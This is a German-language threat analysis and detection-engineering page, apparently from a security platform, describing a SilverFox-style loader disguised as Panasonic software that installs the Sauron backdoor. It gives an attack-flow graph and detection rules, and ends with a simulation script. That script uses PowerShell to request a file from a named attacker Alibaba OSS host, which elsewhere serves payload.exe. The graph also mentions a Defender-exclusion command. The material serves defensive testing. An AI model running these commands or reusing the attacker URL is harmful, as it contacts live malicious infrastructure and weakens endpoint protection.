Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Diese Bedrohung konzentriert sich auf eine hochentwickelte mehrstufige Ladeprogramm-Kette, die als legitime Panasonic-Software getarnt ist. Die Malware verwendet Alibaba OSS zur Bereitstellung von Payloads und setzt auf bildbasierte verschlüsselte Träger, die ein charakteristisches fünf-Byte-EOF-Trailer-Format verwenden. Die letzte Phase installiert den Sauron-Backdoor, der durch Dienst-Erstellung und gezielte Registrierungsänderungen persistiert.
Untersuchung
Analysten führten sowohl eine statische als auch eine dynamische Analyse durch und deckten eine Abfolge von Side-Loading-Operationen auf, die von Binaries, getarnt als Tencent- und Philips-Software, durchgeführt wurden. Die Untersuchung enthüllte eine geschichtete Entschlüsselungsroutine unter Verwendung von inkrementierendem XOR und RC4 sowie die Erstellung geplanter Aufgaben über RPC-Mechanismen. Speicherforensik und Sandbox-Telemetrie halfen, den vollständigen Ausführungspfad vom anfänglichen Panasonic-basierten Wrapper bis zum endgültigen Sauron-Backdoor zu rekonstruieren.
Minderung
Organisationen sollten die unbefugte RPC-basierte Planung von Aufgaben und die verdächtige Erstellung geplanter Aufgaben über NdrClientCall3überwachen. Eine starke Anwendungs-Whitelist kann helfen, die Ausführung nicht genehmigter Side-Loaded-DLLs zu blockieren. Verteidiger sollten auch auf unerwartetes Löschen von Volume-Schattenkopien und verdächtige Registrierungsänderungen unter HKCUSOFTWARE.
Reaktion
Wenn diese Aktivität erkannt wird, isolieren Sie die betroffenen Systeme sofort, um eine weitere laterale Bewegung oder Kommunikationskommandos zu stoppen. Führen Sie Speicherforensik durch, um die injizierten Module zu identifizieren und den aktuellen Stand der Ladeprogramm-Kette zu bestimmen. Netzprotokolle sollten ebenfalls auf Verkehr zu Alibaba OSS-Infrastruktur und den bekannten Kommando-und-Kontroll-IP-Adressen überprüft werden, die während der Ersteinschätzung identifiziert wurden.
graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious[„<b>Action</b> – <b id=’T1204.002’>User Execution: Malicious File</b><br/><b>File</b>: ainstaller-86533005.exe<br/><b>Description</b>: User executes trojanized executable<br/>disguised as Panasonic PC Notification software.“] class exec_user_malicious action %% Obfuscation and Masquerading obf_files[„<b id=’T1027’>Obfuscated Files or Information</b><br/><b>Technique</b>: Multi-layer staged buffers<br/><b>Mechanism</b>: Custom XOR/RC4 decoding<br/><b>Extraction</b>: Five-byte EOF trailer from image carriers.“] class obf_files malware mask_file_type[„<b id=’T1036.008’>Masquerading: Masquerade File Type</b><br/><b>Description</b>: Using image extensions (gif, jpg, png, db)<br/>to hide encrypted payloads.“] class mask_file_type evasion %% Proxy Execution proxy_sys_bin[„<b id=’T1218’>System Binary Proxy Execution</b><br/><b>Target 1</b>: Tencent UxEnhanceHost loading UxEnhance64.dll<br/><b>Target 2</b>: Philips/Speech Processing Solutions host loading XPSPLOG.dll“] class proxy_sys_bin action %% Persistence persist_sched_task[„<b id=’T1053.005’>Scheduled Task/Job: Scheduled Task</b><br/><b>Module</b>: VirtuOne<br/><b>Mechanism</b>: RPC calls to Task Scheduler via \pipeatsvc<br/><b>Goal</b>: Create hidden repeating tasks.“] class persist_sched_task persistence %% Defense Evasion evade_def_impair[„<b id=’T1685’>Defense Impairment</b><br/><b>Action</b>: Patching ntdll.dll!NtTraceEvent“] class evade_def_impair evasion evade_selective_excl[„<b id=’T1679’>Selective Exclusion</b><br/><b>Tool</b>: PowerShell<br/><b>Command</b>: Add-MpPreference -ExclusionPath<br/><b>Goal</b>: Add Windows Defender exclusions.“] class evade_selective_excl evasion %% Final Stage proxy_rundll32[„<b id=’T1218.011’>System Binary Proxy Execution: Rundll32</b><br/><b>File</b>: rundll32.dat<br/><b>Export</b>: Edge<br/><b>Action</b>: Installs and starts malicious service.“] class proxy_rundll32 action malware_sauron[„<b id=’Malware’>Malware: Sauron</b><br/><b>Type</b>: Malicious Service<br/><b>Capability</b>: Persistent backdoor and command-launching.“] class malware_sauron malware %% Connections %% Flow of execution exec_user_malicious –>|triggers| obf_files obf_files –>|utilizes| mask_file_type mask_file_type –>|leads_to| proxy_sys_bin proxy_sys_bin –>|enables| persist_sched_task persist_sched_task –>|facilitates| evade_def_impair persist_sched_task –>|facilitates| evade_selective_excl evade_def_impair –>|prepares environment for| proxy_rundll32 evade_selective_excl –>|prepares environment for| proxy_rundll32 proxy_rundll32 –>|installs| malware_sauron
Angriffsverlauf
Erkennungen
Systemprozesse aus untypischen Pfaden (via process_creation)
Ansicht
Verdächtige Ausführungen aus dem öffentlichen Benutzerprofil (via process_creation)
Ansicht
Verdächtige VSSADMIN Aktivität (via cmdline)
Ansicht
Verdächtige Änderungen in den Windows Defender Einstellungen (via powershell)
Ansicht
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansicht
Erkennung von SilverFox-Stil-Ladeprogramm-Netzwerk-Indikatoren [Windows Netzwerkverbindung]
Ansicht
Erkennung von SilverFox-Stil-Ladeprogramm unter Verwendung eines infizierten Panasonic-Executable [Windows Process Creation]
Ansicht
Simulation ausführen
Voraussetzung: Der Telemetrie- und Basislinie-Freigabestart muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifer-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und sollen die genaue Telemetrie erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffsaufbau und Befehle: Der Angreifer beabsichtigt, eine zweite Stufe der Nutzlast herunterzuladen, indem ein legitimer Cloud-Speicherdienst verwendet wird, um sich in den normalen Datenverkehr einzufügen. Der Angreifer nutzt einen PowerShell-One-Liner, um einen Loader zu simulieren, welcher eine Anfrage an eine bekannte SilverFox Alibaba OSS URL stellt:
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. Diese Aktion zielt darauf ab, einfache Domain-Filter zu umgehen, indem sie auf den Ruf vonaliyuncs.comzurückgreift und den spezifischen bösartigen Pfad nutzt, der in der Erkennungsregel definiert ist. -
Regressionstestskript:
# Simulation eines SilverFox-Ladeprogramms-Netzwerkindikators # Dieses Skript versucht, eine Verbindung zu der spezifischen von der Sigma-Regel überwachten URL herzustellen. $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] Simulation der SilverFox-Netzwerkverbindung zu: $targetUrl" try { # Mit Invoke-WebRequest zur Erzeugung standardmäßiger HTTP-Proxy-Telemetrie $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] Anfrage abgeschlossen. Statuscode: $($response.StatusCode)" } catch { # Wir erwarten einen 404- oder Verbindungsfehler, wenn die URL tatsächlich keine Datei hostet, # aber das Proxy-Protokoll wird dennoch den Versuch aufzeichnen. Write-Host "[-] Anfrage versucht. Überprüfen Sie die Proxy-Logs für den Verbindungsversuch." } -
Bereinigung Befehle:
# Keine nachhaltigen Änderungen durch diese Simulation; keine Bereinigung erforderlich. Write-Host "[*] Bereinigung der Simulation abgeschlossen."